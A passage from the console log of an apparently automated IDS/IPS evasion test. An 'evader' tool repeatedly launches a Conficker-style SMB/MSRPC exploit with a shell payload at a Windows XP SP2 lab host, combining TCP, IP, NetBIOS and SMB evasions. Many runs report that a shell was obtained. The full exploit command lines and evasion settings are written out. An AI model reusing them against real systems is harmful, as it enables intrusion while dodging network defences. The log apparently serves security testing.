  4146. 7161 runs averaging 1.93 runs / second ; progress: 3706/43200......2015-06-08 00:21:18 INFO
  4147. Success. (10.62.90.111):
  4148. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55696 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=wu99YAOc5D4 --evasion=[start,end]tcp_paws,"1","137960857","random_alpha" --evasion=[smb_connect,smb_opentree]tcp_segvar,"7","9" --verifydelay=1000 --payload=shell
  4149. Info: Using random seed wu99YAOc5D7
  4150. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 137960857> and has random alpha bytes as payload
  4151. The following evasions are applied from stage smb_connect to smb_opentree:
  4152. - TCP packets are segmented to contain between 7 and 9 bytes of payload.
  4153.  
  4154. Info: NetBIOS connection 10.62.90.111:55696 -> 10.35.1.207:445
  4155. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4156. Info: Sending MSRPC request with exploit
  4157. Info: Shell found, attack succeeded
  4158. Info: Shell closed
  4159. 0: Success.
  4160. .....2015-06-08 00:21:20 INFO
  4161. Success. (10.62.90.119):
  4162. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45781 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=ZZ+P5wIie94 --evasion=[smb_connect,msrpc_req]tcp_paws,"1","8","alphanumrandomized" --evasion=[netbios_connect,msrpc_bind]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  4163. Info: Using random seed ZZ+P5wIie95
  4164. The following evasions are applied from stage netbios_connect to msrpc_bind:
  4165. - TCP timestamps echo reply value is sent in the wrong endianness
  4166. The following evasions are applied from stage smb_connect to msrpc_req:
  4167. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has original payload with alphanumeric bytes randomized
  4168.  
  4169. Info: NetBIOS connection 10.62.90.119:45781 -> 10.35.1.207:445
  4170. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4171. Info: Sending MSRPC request with exploit
  4172. Info: Shell found, attack succeeded
  4173. Info: Shell closed
  4174. 0: Success.
  4175. .
  4176. 7175 runs averaging 1.93 runs / second ; progress: 3711/43200...
  4177. 7178 runs averaging 1.93 runs / second ; progress: 3716/43200
  4178. 7178 runs averaging 1.93 runs / second ; progress: 3721/43200.........
  4179. 7187 runs averaging 1.93 runs / second ; progress: 3726/43200........
  4180. 7195 runs averaging 1.93 runs / second ; progress: 3731/43200.....
  4181. 7200 runs averaging 1.93 runs / second ; progress: 3736/43200......
  4182. 7206 runs averaging 1.93 runs / second ; progress: 3741/43200...............
  4183. 7221 runs averaging 1.93 runs / second ; progress: 3746/43200..............2015-06-08 00:22:00 INFO
  4184. Success. (10.62.90.111):
  4185. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57074 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=5cqSwRZrPCA --evasion=[msrpc_req,end]netbios_chaff,"3","empty_keepalive|small_unspec|http_get|msrpc_req|broken_length" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","10","random_alphanum" --verifydelay=1000 --payload=shell
  4186. Info: Using random seed 5cqSwRZrPCD
  4187. The following evasions are applied from stage smb_openpipe to msrpc_req:
  4188. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has random alphanumeric bytes as payload
  4189. The following evasions are applied from stage msrpc_req to end:
  4190. - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  4191.  
  4192. Info: NetBIOS connection 10.62.90.111:57074 -> 10.35.1.207:445
  4193. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4194. Info: Sending MSRPC request with exploit
  4195. Info: Shell found, attack succeeded
  4196. Info: CommandShell::SendCommand() - Failed to send string
  4197. Info: Command shell connection reset.
  4198. Info: Shell closed
  4199. 0: Success.
  4200. ........
  4201. 7244 runs averaging 1.93 runs / second ; progress: 3751/43200..............
  4202. 7258 runs averaging 1.93 runs / second ; progress: 3756/43200..2015-06-08 00:22:08 INFO
  4203. Success. (10.62.90.111):
  4204. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62429 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=0NColTrOQC8 --evasion=[netbios_connect,end]ipv4_opt,"8","inc","random_alpha" --evasion=[msrpc_req,end]smb_fnameobf,"change_case" --evasion=[smb_opentree,end]tcp_paws,"25%","3","random_alpha" --verifydelay=1000 --payload=shell
  4205. Info: Using random seed 0NColTrOQC/
  4206. The following evasions are applied from stage netbios_connect to end:
  4207. - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  4208. The duplicate packet has random alphabetic bytes as payload
  4209. The following evasions are applied from stage smb_opentree to end:
  4210. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alpha bytes as payload
  4211. The following evasions are applied from stage msrpc_req to end:
  4212. - The SMB filename is obfuscated:
  4213. * Random characters case is changed
  4214.  
  4215. Info: NetBIOS connection 10.62.90.111:62429 -> 10.35.1.207:445
  4216. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4217. Info: Sending MSRPC request with exploit
  4218. Info: Shell found, attack succeeded
  4219. Info: Shell closed
  4220. 0: Success.
  4221. ..
  4222. 7263 runs averaging 1.93 runs / second ; progress: 3761/43200.......
  4223. 7270 runs averaging 1.93 runs / second ; progress: 3766/43200...............
  4224. 7285 runs averaging 1.93 runs / second ; progress: 3771/43200...2015-06-08 00:22:23 INFO
  4225. Success. (10.62.90.119):
  4226. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17911 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=7pze8/Sv444 --evasion=[smb_opentree,msrpc_req]smb_chaff,"8","write_flag","zero" --evasion=[smb_openpipe,end]smb_writeandxpad,"1","random_alphanum" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","162615983","shuffle" --verifydelay=1000 --payload=shell
  4227. Info: Using random seed 7pze8/Sv447
  4228. The following evasions are applied from stage smb_opentree to msrpc_req:
  4229. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 162615983> and has shuffled original payload
  4230. - Before every 8th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
  4231. The following evasions are applied from stage smb_openpipe to end:
  4232. - 1 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
  4233.  
  4234. Info: NetBIOS connection 10.62.90.119:17911 -> 10.35.1.207:445
  4235. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4236. Info: Sending MSRPC request with exploit
  4237. Info: Shell found, attack succeeded
  4238. Info: CommandShell::SendCommand() - Failed to send string
  4239. Info: Command shell connection reset.
  4240. Info: Shell closed
  4241. 0: Success.
  4242. .......
  4243. 7296 runs averaging 1.93 runs / second ; progress: 3776/43200.....
  4244. 7301 runs averaging 1.93 runs / second ; progress: 3781/43200Pid 24284 timed out - killed
  4245. 2015-06-08 00:22:32 INFO
  4246. Timed out (10.62.90.113):
  4247. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23611 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=5alRX97X2kI --evasion=[smb_openpipe,msrpc_bind]tcp_seg,"1" --evasion=[smb_connect,end]tcp_urgent,"5","random" --verifydelay=1000 --payload=shell
  4248. Info: Using random seed 5alRX97X2kL
  4249. The following evasions are applied from stage smb_connect to end:
  4250. - Add a random urgent data byte to every 5 TCP segment.
  4251. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  4252. - TCP packets are segmented to contain at most 1 bytes of payload.
  4253.  
  4254. Info: NetBIOS connection 10.62.90.113:23611 -> 10.35.1.207:445
  4255. Terminated
  4256. ......
  4257. 7308 runs averaging 1.93 runs / second ; progress: 3786/43200.......Pid 24401 timed out - killed
  4258. 2015-06-08 00:22:38 INFO
  4259. Timed out (10.62.90.117):
  4260. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15171 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=xVzzkXF3BXg --evasion=[start,end]tcp_chaff,"75%","outofwindow|longhdr","alphanumrandomized" --evasion=[smb_openpipe,end]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
  4261. Info: Using random seed xVzzkXF3BXj
  4262. - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  4263. * An out-of-window sequence number.
  4264. * TCP header longer than packet total size
  4265. * Duplicate packet has original payload with alphanumeric bytes randomized
  4266. The following evasions are applied from stage smb_openpipe to end:
  4267. - 25% probability to add a random alphaurgent data byte to a TCP segment.
  4268.  
  4269. Info: NetBIOS connection 10.62.90.117:15171 -> 10.35.1.207:445
  4270. Terminated
  4271. ......2015-06-08 00:22:41 INFO
  4272. Success. (10.62.90.117):
  4273. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28276 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=8Ve8ihD6S7w --evasion=[smb_opentree,msrpc_bind]tcp_overlap,"427","new","random_alpha" --evasion=[smb_openpipe,end]tcp_paws,"75%","238041912","alpharandomized" --verifydelay=1000 --payload=shell
  4274. Info: Using random seed 8Ve8ihD6S7z
  4275. The following evasions are applied from stage smb_opentree to msrpc_bind:
  4276. - TCP segments are set to overlap by 427 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
  4277. The following evasions are applied from stage smb_openpipe to end:
  4278. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 238041912> and has original payload with alphabetic bytes randomized
  4279.  
  4280. Info: NetBIOS connection 10.62.90.117:28276 -> 10.35.1.207:445
  4281. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4282. Info: Sending MSRPC request with exploit
  4283. Info: Shell found, attack succeeded
  4284. Info: Shell closed
  4285. 0: Success.
  4286.  
  4287. 7323 runs averaging 1.93 runs / second ; progress: 3791/43200.....................
  4288. 7344 runs averaging 1.93 runs / second ; progress: 3796/43200.......2015-06-08 00:22:49 INFO
  4289. Success. (10.62.90.119):
  4290. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13572 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=WCJX7PrlRFg --evasion=[netbios_connect,smb_openpipe]ipv4_opt,"21","inc","random_alphanum" --evasion=[smb_opentree,msrpc_bind]ipv4_opt,"13","inc","zero" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","4","shuffle" --verifydelay=1000 --payload=shell
  4291. Info: Using random seed WCJX7PrlRFh
  4292. The following evasions are applied from stage netbios_connect to smb_openpipe:
  4293. - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  4294. The duplicate packet has random alphanumeric bytes as payload
  4295. The following evasions are applied from stage smb_opentree to msrpc_bind:
  4296. - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  4297. The duplicate packet has NULL bytes for payload
  4298. The following evasions are applied from stage msrpc_bind to msrpc_req:
  4299. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has shuffled original payload
  4300.  
  4301. Info: NetBIOS connection 10.62.90.119:13572 -> 10.35.1.207:445
  4302. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4303. Info: Sending MSRPC request with exploit
  4304. Info: Shell found, attack succeeded
  4305. Info: Command shell connection reset.
  4306. Info: CommandShell::SendCommand() - Failed to send string
  4307. Info: Shell closed
  4308. 0: Success.
  4309. .......
  4310. 7359 runs averaging 1.94 runs / second ; progress: 3802/43200.Pid 24561 timed out - killed
  4311. 2015-06-08 00:22:53 INFO
  4312. Timed out (10.62.90.114):
  4313. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47020 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=4AYntnpSJsY --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"80" --evasion=[smb_openpipe,end]smb_decoytrees,"3","5","2047","random_msrpcreq" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
  4314. Info: Using random seed 4AYntnpSJsb
  4315. The following evasions are applied from stage smb_connect to msrpc_bind:
  4316. - 25% probability to add a zero urgent data byte to a TCP segment.
  4317. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  4318. - IPv4 fragments with at most 80 bytes per fragment
  4319. The following evasions are applied from stage smb_openpipe to end:
  4320. - Before normal SMB writes, 3 SMB trees are opened and 5 writes are performed to them. The write payload is 2047 bytes of MSRPC request-like data.
  4321.  
  4322. Info: NetBIOS connection 10.62.90.114:47020 -> 10.35.1.207:445
  4323. Terminated
  4324. ...2015-06-08 00:22:55 INFO
  4325. Success. (10.62.90.111):
  4326. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62759 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=RvuqRNAqohM --evasion=[msrpc_bind,end]tcp_chaff,"75%","nullchksum|outofwindow|shorthdr|longhdr","alphanumrandomized" --evasion=[msrpc_req,end]tcp_paws,"75%","268435455","shuffle" --verifydelay=1000 --payload=shell
  4327. Info: Using random seed RvuqRNAqohN
  4328. The following evasions are applied from stage msrpc_bind to end:
  4329. - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  4330. * NULL TCP checksum.
  4331. * An out-of-window sequence number.
  4332. * TCP header shorter than 20 bytes
  4333. * TCP header longer than packet total size
  4334. * Duplicate packet has original payload with alphanumeric bytes randomized
  4335. The following evasions are applied from stage msrpc_req to end:
  4336. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has shuffled original payload
  4337.  
  4338. Info: NetBIOS connection 10.62.90.111:62759 -> 10.35.1.207:445
  4339. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4340. Info: Sending MSRPC request with exploit
  4341. Info: Shell found, attack succeeded
  4342. Info: CommandShell::SendCommand() - Failed to send string
  4343. Info: Command shell connection reset.
  4344. Info: Shell closed
  4345. 0: Success.
  4346. .....
  4347. 7370 runs averaging 1.94 runs / second ; progress: 3807/43200......
  4348. 7376 runs averaging 1.94 runs / second ; progress: 3812/43200...........
  4349. 7387 runs averaging 1.94 runs / second ; progress: 3817/43200..................
  4350. 7405 runs averaging 1.94 runs / second ; progress: 3822/43200..............
  4351. 7419 runs averaging 1.94 runs / second ; progress: 3827/43200................
  4352. 7435 runs averaging 1.94 runs / second ; progress: 3832/43200......2015-06-08 00:23:25 INFO
  4353. Success. (10.62.90.116):
  4354. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13041 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=oSdy0TUrlxM --evasion=[smb_connect,smb_opentree]ipv4_frag,"480" --evasion=[smb_connect,msrpc_req]smb_decoytrees,"6","6","719","random_msrpcbind" --verifydelay=1000 --payload=shell
  4355. Info: Using random seed oSdy0TUrlxO
  4356. The following evasions are applied from stage smb_connect to smb_opentree:
  4357. - IPv4 fragments with at most 480 bytes per fragment
  4358. The following evasions are applied from stage smb_connect to msrpc_req:
  4359. - Before normal SMB writes, 6 SMB trees are opened and 6 writes are performed to them. The write payload is 719 bytes of MSRPC bind-like data.
  4360.  
  4361. Info: NetBIOS connection 10.62.90.116:13041 -> 10.35.1.207:445
  4362. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4363. Info: Sending MSRPC request with exploit
  4364. Info: Shell found, attack succeeded
  4365. Info: CommandShell::SendCommand() - Failed to send string
  4366. Info: Command shell connection reset.
  4367. Info: Shell closed
  4368. 0: Success.
  4369. .......
  4370. 7449 runs averaging 1.94 runs / second ; progress: 3837/43200............
  4371. 7461 runs averaging 1.94 runs / second ; progress: 3842/43200.
  4372. 7462 runs averaging 1.94 runs / second ; progress: 3847/43200.2015-06-08 00:23:37 INFO
  4373. Success. (10.62.90.113):
  4374. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25609 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=jDaePIJ6iso --evasion=[netbios_connect,msrpc_bind]ipv4_opt,"50%","inc","random_alphanum" --evasion=[smb_opentree,end]smb_chaff,"8","write_flag","alphanum" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","8","zero" --verifydelay=1000 --payload=shell
  4375. Info: Using random seed jDaePIJ6isq
  4376. The following evasions are applied from stage netbios_connect to msrpc_bind:
  4377. - 50% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
  4378. The duplicate packet has random alphanumeric bytes as payload
  4379. The following evasions are applied from stage smb_opentree to msrpc_req:
  4380. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 0x00 bytes as payload
  4381. The following evasions are applied from stage smb_opentree to end:
  4382. - Before every 8th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
  4383.  
  4384. Info: NetBIOS connection 10.62.90.113:25609 -> 10.35.1.207:445
  4385. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4386. Info: Sending MSRPC request with exploit
  4387. Info: Shell found, attack succeeded
  4388. Info: Shell closed
  4389. 0: Success.
  4390. .....
  4391. 7469 runs averaging 1.94 runs / second ; progress: 3852/43200....
  4392. 7473 runs averaging 1.94 runs / second ; progress: 3857/43200......
  4393. 7479 runs averaging 1.94 runs / second ; progress: 3862/43200.................
  4394. 7496 runs averaging 1.94 runs / second ; progress: 3867/43200...................
  4395. 7515 runs averaging 1.94 runs / second ; progress: 3872/43200...........
  4396. 7526 runs averaging 1.94 runs / second ; progress: 3877/43200....
  4397. 7530 runs averaging 1.94 runs / second ; progress: 3882/43200..2015-06-08 00:24:17 INFO
  4398. Success. (10.62.90.113):
  4399. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20015 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=dQUimTokmKg --evasion=[netbios_connect,smb_opentree]tcp_paws,"75%","7","alpharandomized" --evasion=[smb_connect,msrpc_req]tcp_paws,"1","10","alpharandomized" --verifydelay=1000 --payload=shell
  4400. Info: Using random seed dQUimTokmKh
  4401. The following evasions are applied from stage netbios_connect to smb_opentree:
  4402. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphabetic bytes randomized
  4403. The following evasions are applied from stage smb_connect to msrpc_req:
  4404. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has original payload with alphabetic bytes randomized
  4405.  
  4406. Info: NetBIOS connection 10.62.90.113:20015 -> 10.35.1.207:445
  4407. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4408. Info: Sending MSRPC request with exploit
  4409. Info: Shell found, attack succeeded
  4410. Info: Shell closed
  4411. 0: Success.
  4412.  
  4413. 7533 runs averaging 1.94 runs / second ; progress: 3887/43200..2015-06-08 00:24:19 INFO
  4414. Success. (10.62.90.113):
  4415. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24870 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=LEWXIa/Bd2k --evasion=[start,msrpc_bind]ipv4_frag,"56" --evasion=[start,netbios_connect]ipv4_order,"firstlast" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","8","shuffle30" --verifydelay=1000 --payload=shell
  4416. Info: Using random seed LEWXIa/Bd2k
  4417. The following evasions are applied from stage start to msrpc_bind:
  4418. - IPv4 fragments with at most 56 bytes per fragment
  4419. The following evasions are applied from stage start to netbios_connect:
  4420. - IPv4 fragments are sent in correct order except that the first fragment comes last
  4421. The following evasions are applied from stage msrpc_bind to msrpc_req:
  4422. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 30 bytes of original payload, then shuffled original payload
  4423.  
  4424. Info: NetBIOS connection 10.62.90.113:24870 -> 10.35.1.207:445
  4425. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4426. Info: Sending MSRPC request with exploit
  4427. Info: Shell found, attack succeeded
  4428. Info: CommandShell::SendCommand() - Failed to send string
  4429. Info: Command shell connection reset.
  4430. Info: Shell closed
  4431. 0: Success.
  4432. ....
  4433. 7540 runs averaging 1.94 runs / second ; progress: 3892/43200.........
  4434. 7549 runs averaging 1.94 runs / second ; progress: 3897/43200..........
  4435. 7559 runs averaging 1.94 runs / second ; progress: 3902/43200..Pid 25915 timed out - killed
  4436. 2015-06-08 00:24:34 INFO
  4437. Timed out (10.62.90.115):
  4438. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31672 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=R7NIX+Io+yg --evasion=[start,smb_openpipe]ipv4_frag,"48" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
  4439. Info: Using random seed R7NIX+Io+yh
  4440. The following evasions are applied from stage start to smb_openpipe:
  4441. - IPv4 fragments with at most 48 bytes per fragment
  4442. The following evasions are applied from stage smb_openpipe to msrpc_req:
  4443. - Add a random alphanumeric urgent data byte to every 1 TCP segment.
  4444.  
  4445. Info: NetBIOS connection 10.62.90.115:31672 -> 10.35.1.207:445
  4446. Terminated
  4447. .........
  4448. 7571 runs averaging 1.94 runs / second ; progress: 3907/43200........Pid 26040 timed out - killed
  4449. 2015-06-08 00:24:39 INFO
  4450. Timed out (10.62.90.110):
  4451. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42437 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=5+99742Gcsk --evasion=[smb_opentree,end]tcp_paws,"5","6","shuffle30" --evasion=[netbios_connect,smb_connect]tcp_seg,"10" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
  4452. Info: Using random seed 5+99742Gcsn
  4453. The following evasions are applied from stage netbios_connect to smb_connect:
  4454. - TCP packets are segmented to contain at most 10 bytes of payload.
  4455. The following evasions are applied from stage smb_opentree to end:
  4456. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 30 bytes of original payload, then shuffled original payload
  4457. The following evasions are applied from stage smb_openpipe to msrpc_req:
  4458. - 25% probability to add a zero urgent data byte to a TCP segment.
  4459.  
  4460. Info: NetBIOS connection 10.62.90.110:42437 -> 10.35.1.207:445
  4461. Terminated
  4462. ............
  4463. 7592 runs averaging 1.94 runs / second ; progress: 3912/43200......2015-06-08 00:24:45 INFO
  4464. Success. (10.62.90.117):
  4465. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62963 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=rk+a46qwtk4 --evasion=[msrpc_bind,msrpc_req]msrpc_ndrflag,"char_ebcdic","float_ibm","byte3_nonzero","byte4_nonzero" --evasion=[smb_connect,end]tcp_paws,"25%","119368059","random" --verifydelay=1000 --payload=shell
  4466. Info: Using random seed rk+a46qwtk6
  4467. The following evasions are applied from stage smb_connect to end:
  4468. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 119368059> and has random bytes as payload
  4469. The following evasions are applied from stage msrpc_bind to msrpc_req:
  4470. - MSRPC NDR flag is modified:
  4471. * EBCDIC character encoding
  4472. * IBM floating point value encoding
  4473. * Reserved 3rd byte is set to a random non-zero value
  4474. * Reserved 4th byte is set to a random non-zero value
  4475.  
  4476.  
  4477. Info: NetBIOS connection 10.62.90.117:62963 -> 10.35.1.207:445
  4478. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4479. Info: Sending MSRPC request with exploit
  4480. Info: Shell found, attack succeeded
  4481. Info: Shell closed
  4482. 0: Success.
  4483. .
  4484. 7600 runs averaging 1.94 runs / second ; progress: 3917/43200......
  4485. 7606 runs averaging 1.94 runs / second ; progress: 3922/43200........
  4486. 7614 runs averaging 1.94 runs / second ; progress: 3927/43200.............
  4487. 7627 runs averaging 1.94 runs / second ; progress: 3932/43200...........
  4488. 7638 runs averaging 1.94 runs / second ; progress: 3937/43200............
  4489. 7650 runs averaging 1.94 runs / second ; progress: 3942/43200...........
  4490. 7661 runs averaging 1.94 runs / second ; progress: 3947/43200........
  4491. 7669 runs averaging 1.94 runs / second ; progress: 3952/43200..
  4492. 7671 runs averaging 1.94 runs / second ; progress: 3957/43200.........
  4493. 7680 runs averaging 1.94 runs / second ; progress: 3962/43200................
  4494. 7696 runs averaging 1.94 runs / second ; progress: 3967/43200..........2015-06-08 00:25:40 INFO
  4495. Success. (10.62.90.115):
  4496. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59021 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=Z0Kg5SOkUyY --evasion=[smb_connect,end]ipv4_frag,"48" --evasion=[smb_opentree,end]tcp_paws,"5","98447718","random_alphanum" --verifydelay=1000 --payload=shell
  4497. Info: Using random seed Z0Kg5SOkUyZ
  4498. The following evasions are applied from stage smb_connect to end:
  4499. - IPv4 fragments with at most 48 bytes per fragment
  4500. The following evasions are applied from stage smb_opentree to end:
  4501. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 98447718> and has random alphanumeric bytes as payload
  4502.  
  4503. Info: NetBIOS connection 10.62.90.115:59021 -> 10.35.1.207:445
  4504. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4505. Info: Sending MSRPC request with exploit
  4506. Info: Shell found, attack succeeded
  4507. Info: CommandShell::SendCommand() - Failed to send string
  4508. Info: Command shell connection reset.
  4509. Info: Shell closed
  4510. 0: Success.
  4511. ...
  4512. 7710 runs averaging 1.94 runs / second ; progress: 3972/43200
  4513. 7710 runs averaging 1.94 runs / second ; progress: 3977/43200Pid 27451 timed out - killed
  4514. 2015-06-08 00:25:50 INFO
  4515. Timed out (10.62.90.112):
  4516. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31480 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=XOBw9+XbinQ --evasion=[smb_connect,end]netbios_chaff,"3","empty_unspec|small_unspec|http_get|msrpc_req|broken_length" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","zero" --verifydelay=1000 --payload=shell
  4517. Info: Using random seed XOBw9+XbinR
  4518. The following evasions are applied from stage smb_connect to end:
